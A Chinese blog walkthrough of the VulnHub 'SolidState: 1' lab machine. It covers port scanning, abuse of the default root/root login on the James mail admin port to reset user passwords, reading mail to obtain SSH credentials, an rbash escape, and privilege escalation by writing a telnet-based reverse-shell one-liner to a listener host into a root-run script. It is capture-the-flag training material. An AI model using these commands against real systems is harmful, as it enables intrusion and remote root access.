当前位置:网站首页>vulnhub-SolidState: 1靶机渗透测试
vulnhub-SolidState: 1靶机渗透测试
2022-07-24 05:18:00 【突出啊突出】
一、ip探测

二、端口探测
- 发现频繁出现james,并且4555端口还运行james-admin

三、端口信息收集

- 查看下脚本,发现使用root/root连接4555端口


四、端口信息利用
4.1 nc连接4555端口(root/root)
- 发现存在5个用户,并将5个用户密码均重置为123


4.2 依次登录账户,查看邮件(POP3)
- 使用telnet登录邮件后,发现john账户中有一封关于mindy的邮件

- 登录mindy账户查看邮件内容,发现ssh用户名和密码

4.3 登录ssh
- 登录后发现是个受限rbash,很多命令无法执行

4.4 rbash绕过
- 在ssh登录时尝试绕过

4.5 升级终端
- 终端优化

python -c 'import pty; pty.spawn("/bin/bash")' ctrl + z stty raw -echo;fg export TERM=xterm reset4.6 查看其他用户进程
- 通过/etc/passwd知还存在james用户,查看该用户进程,进入/opt目录,发现存在root账户权限的文件

4.7 写入反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 172.16.9.9 3333 > /tmp/f
4.8 开启本地监听
- 收到反弹回来的shell为root权限,提权完成。

边栏推荐
- Promise_ Async and await
- Keywords_ 01return
- 树状结构+节点
- OpenGL draws two points on the screen, a blue point on the right, using anti aliasing technology, and a red point on the left, without anti aliasing technology. Compare the difference between the two
- 登录 页面 + 总结心得
- JS - 数值处理(取整、四舍五入、随机数等)
- Vulnhub-Funbox: Rookie(Funbox2)靶机渗透
- select_ Render small phenomena
- haclabs: no_name(HL.ova)靶机渗透-Vulnhub
- Geoserver REST API功能解析
猜你喜欢

MySQL之函数运用

jsp标签

Station B video comment crawling - take the blade of ghost destruction as an example (and store it in CSV)

Pycharm configures LAN access, and the LAN cannot access the solution
![JS:为什么 [] == ![] 返回 true ?](/img/36/94839bf4ce6bd06d2cbe989828c791.png)
JS:为什么 [] == ![] 返回 true ?

Mobile software development ISO simple wechat

How to forcibly uninstall Google browser? Don't worry about Google opening as a whiteboard. It's effective for personal testing.

Summary of data types

px和em和rem区别

special effects - 鼠标移动,出现泡泡拖尾
随机推荐
通用分页2.0
新建 umi 项目,Error: Rendered more hooks 或者 Rendered fewer hooks
special effects - 蜘蛛网背景特效
Collation of commonly used Anaconda commands
随意写写 cookie,sessionStorage,localStorage和session
模板数据的二次加工
special effects - 鼠标移动,出现星星拖尾
String_ Method_ 01match method
收藏==学废
如何强制卸载Google浏览器,不用担心Google打开为白板,亲测有效。
Promise
JS - 数值处理(取整、四舍五入、随机数等)
special effects - 鼠标点击,出现随机设置的文字
输入若干数据,找出最大值输出。(键盘和文件读取)
详解浏览器和Node的事件循环机制及区别
JS - 鼠标键盘配置 及 浏览器禁止操作
special effects - 鼠标移动,出现泡泡拖尾
special effects - 鼠标点击,出现烟花炸裂效果
[common skills]
select_ Render small phenomena